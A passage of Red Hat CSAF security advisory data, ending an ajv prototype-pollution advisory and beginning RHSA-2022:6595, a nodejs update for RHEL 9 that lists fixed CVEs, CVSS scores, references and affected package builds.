"AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-15366" }, { "category": "external", "summary": "RHBZ#1857977", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1857977" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-15366", "url": "https://www.cve.org/CVERecord?id=CVE-2020-15366" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-15366", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15366" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-AJV-584908", "url": "https://snyk.io/vuln/SNYK-JS-AJV-584908" } ], "release_date": "2020-07-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:46+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0548" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function" } ] }
rhsa-2022_6595
Vulnerability from csaf_redhat
Published
2022-09-20 12:27
Modified
2024-11-15 13:13
Summary
Red Hat Security Advisory: nodejs and nodejs-nodemon security and bug fix update
Notes
Topic
An update for nodejs and nodejs-nodemon is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
The following packages have been upgraded to a later upstream version: nodejs (16.16.0), nodejs-nodemon (2.0.19). (BZ#2124230, BZ#2124233)
Security Fix(es):
* nodejs-ini: Prototype pollution via malicious INI file (CVE-2020-7788)
* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)
* nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes (CVE-2021-3807)
* normalize-url: ReDoS for data URLs (CVE-2021-33502)
* nodejs: npm pack ignores root-level .gitignore and .npmignore file exclusion directives when run in a workspace (CVE-2022-29244)
* nodejs: DNS rebinding in --inspect via invalid IP addresses (CVE-2022-32212)
* nodejs: HTTP request smuggling due to flawed parsing of Transfer-Encoding (CVE-2022-32213)
* nodejs: HTTP request smuggling due to improper delimiting of header fields (CVE-2022-32214)
* nodejs: HTTP request smuggling due to incorrect parsing of multi-line Transfer-Encoding (CVE-2022-32215)
* got: missing verification of requested URLs allows redirects to UNIX sockets (CVE-2022-33987)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
* nodejs:16/nodejs: Rebase to the latest Nodejs 16 release [rhel-9] (BZ#2121019)
* nodejs: Specify --with-default-icu-data-dir when using bootstrap build (BZ#2124299)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for nodejs and nodejs-nodemon is now available for Red Hat Enterprise Linux 9.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (16.16.0), nodejs-nodemon (2.0.19). (BZ#2124230, BZ#2124233)\n\nSecurity Fix(es):\n\n* nodejs-ini: Prototype pollution via malicious INI file (CVE-2020-7788)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes (CVE-2021-3807)\n\n* normalize-url: ReDoS for data URLs (CVE-2021-33502)\n\n* nodejs: npm pack ignores root-level .gitignore and .npmignore file exclusion directives when run in a workspace (CVE-2022-29244)\n\n* nodejs: DNS rebinding in --inspect via invalid IP addresses (CVE-2022-32212)\n\n* nodejs: HTTP request smuggling due to flawed parsing of Transfer-Encoding (CVE-2022-32213)\n\n* nodejs: HTTP request smuggling due to improper delimiting of header fields (CVE-2022-32214)\n\n* nodejs: HTTP request smuggling due to incorrect parsing of multi-line Transfer-Encoding (CVE-2022-32215)\n\n* got: missing verification of requested URLs allows redirects to UNIX sockets (CVE-2022-33987)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* nodejs:16/nodejs: Rebase to the latest Nodejs 16 release [rhel-9] (BZ#2121019)\n\n* nodejs: Specify --with-default-icu-data-dir when using bootstrap build (BZ#2124299)", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2022:6595", "url": "https://access.redhat.com/errata/RHSA-2022:6595" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "1945459", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945459" }, { "category": "external", "summary": "1964461", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1964461" }, { "category": "external", "summary": "2007557", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2007557" }, { "category": "external", "summary": "2098556", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2098556" }, { "category": "external", "summary": "2102001", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2102001" }, { "category": "external", "summary": "2105422", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2105422" }, { "category": "external", "summary": "2105426", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2105426" }, { "category": "external", "summary": "2105428", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2105428" }, { "category": "external", "summary": "2105430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2105430" }, { "category": "external", "summary": "2121019", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2121019" }, { "category": "external", "summary": "2124299", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2124299" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6595.json" } ], "title": "Red Hat Security Advisory: nodejs and nodejs-nodemon security and bug fix update", "tracking": { "current_release_date": "2024-11-15T13:13:20+00:00", "generator": { "date": "2024-11-15T13:13:20+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2022:6595", "initial_release_date": "2022-09-20T12:27:54+00:00", "revision_history": [ { "date": "2022-09-20T12:27:54+00:00", "number": "1", "summary": "Initial version" }, { "date": "2022-09-20T12:27:54+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-15T13:13:20+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux AppStream (v. 9)", "product": { "name": "Red Hat Enterprise Linux AppStream (v. 9)", "product_id": "AppStream-9.0.0.Z.MAIN.EUS", "product_identification_helper": { "cpe": "cpe:/a:redhat:enterprise_linux:9::appstream" } } } ], "category": "product_family", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:16.16.0-1.el9_0.src", "product": { "name": "nodejs-1:16.16.0-1.el9_0.src", "product_id": "nodejs-1:16.16.0-1.el9_0.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@16.16.0-1.el9_0?arch=src\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:2.0.19-1.el9_0.src", "product": { "name": "nodejs-nodemon-0:2.0.19-1.el9_0.src", "product_id": "nodejs-nodemon-0:2.0.19-1.el9_0.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@2.0.19-1.el9_0?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:16.16.0-1.el9_0.aarch64", "product": { "name": "nodejs-1:16.16.0-1.el9_0.aarch64", "product_id": "nodejs-1:16.16.0-1.el9_0.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@16.16.0-1.el9_0?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "product": { "name": "nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "product_id": "nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@16.16.0-1.el9_0?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-libs-1:16.16.0-1.el9_0.aarch64", "product": { "name": "nodejs-libs-1:16.16.0-1.el9_0.aarch64", "product_id": "nodejs-libs-1:16.16.0-1.el9_0.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-libs@16.16.0-1.el9_0?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "product": { "name": "npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "product_id": "npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@8.11.0-1.16.16.0.1.el9_0?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "product": { "name": "nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "product_id": "nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@16.16.0-1.el9_0?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "product": { "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "product_id": "nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@16.16.0-1.el9_0?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "product": { "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "product_id": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-libs-debuginfo@16.16.0-1.el9_0?arch=aarch64\u0026epoch=1" } } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:16.16.0-1.el9_0.ppc64le", "product": { "name": "nodejs-1:16.16.0-1.el9_0.ppc64le", "product_id": "nodejs-1:16.16.0-1.el9_0.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@16.16.0-1.el9_0?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "product": { "name": "nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "product_id": "nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@16.16.0-1.el9_0?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "product": { "name": "nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "product_id": "nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-libs@16.16.0-1.el9_0?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "product": { "name": "npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "product_id": "npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@8.11.0-1.16.16.0.1.el9_0?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "product": { "name": "nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "product_id": "nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@16.16.0-1.el9_0?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "product": { "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "product_id": "nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@16.16.0-1.el9_0?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "product": { "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "product_id": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-libs-debuginfo@16.16.0-1.el9_0?arch=ppc64le\u0026epoch=1" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:16.16.0-1.el9_0.x86_64", "product": { "name": "nodejs-1:16.16.0-1.el9_0.x86_64", "product_id": "nodejs-1:16.16.0-1.el9_0.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@16.16.0-1.el9_0?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "product": { "name": "nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "product_id": "nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@16.16.0-1.el9_0?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-libs-1:16.16.0-1.el9_0.x86_64", "product": { "name": "nodejs-libs-1:16.16.0-1.el9_0.x86_64", "product_id": "nodejs-libs-1:16.16.0-1.el9_0.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-libs@16.16.0-1.el9_0?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64", "product": { "name": "npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64", "product_id": "npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@8.11.0-1.16.16.0.1.el9_0?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "product": { "name": "nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "product_id": "nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@16.16.0-1.el9_0?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "product": { "name": "nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "product_id": "nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@16.16.0-1.el9_0?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "product": { "name": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "product_id": "nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-libs-debuginfo@16.16.0-1.el9_0?arch=x86_64\u0026epoch=1" } } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_version", "name": "nodejs-libs-1:16.16.0-1.el9_0.i686", "product": { "name": "nodejs-libs-1:16.16.0-1.el9_0.i686", "product_id": "nodejs-libs-1:16.16.0-1.el9_0.i686", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-libs@16.16.0-1.el9_0?arch=i686\u0026epoch=1" } } }, { "category": "product_version", "name": 